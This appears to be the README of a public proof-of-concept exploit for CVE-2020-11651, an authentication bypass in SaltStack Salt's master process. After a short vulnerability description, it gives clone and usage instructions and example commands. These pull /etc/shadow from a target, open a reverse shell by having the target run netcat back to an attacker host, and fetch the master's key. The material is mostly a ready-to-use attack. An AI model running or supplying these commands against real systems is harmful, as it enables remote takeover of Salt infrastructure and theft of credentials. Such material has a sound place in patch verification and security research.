An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Patches for unspported salt versions
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]
CVE-2020-11651 PoC
optional arguments:
-h, --help show this help message and exit
--host HOST, -t HOST
--port PORT, -p PORT
--execute COMMAND, -e COMMAND
Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
--upload src dest, -u src dest
Upload a file
--download src dest, -d src dest
Download a file
--minions Send command to all minions on master
--quiet, -q Enable quiet/silent mode
--fetch-key-only Only fetch the key
./PoC.py --host target.com --download /etc/shadow ./shadow
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""
./PoC.py --host target.com --fetch-key-only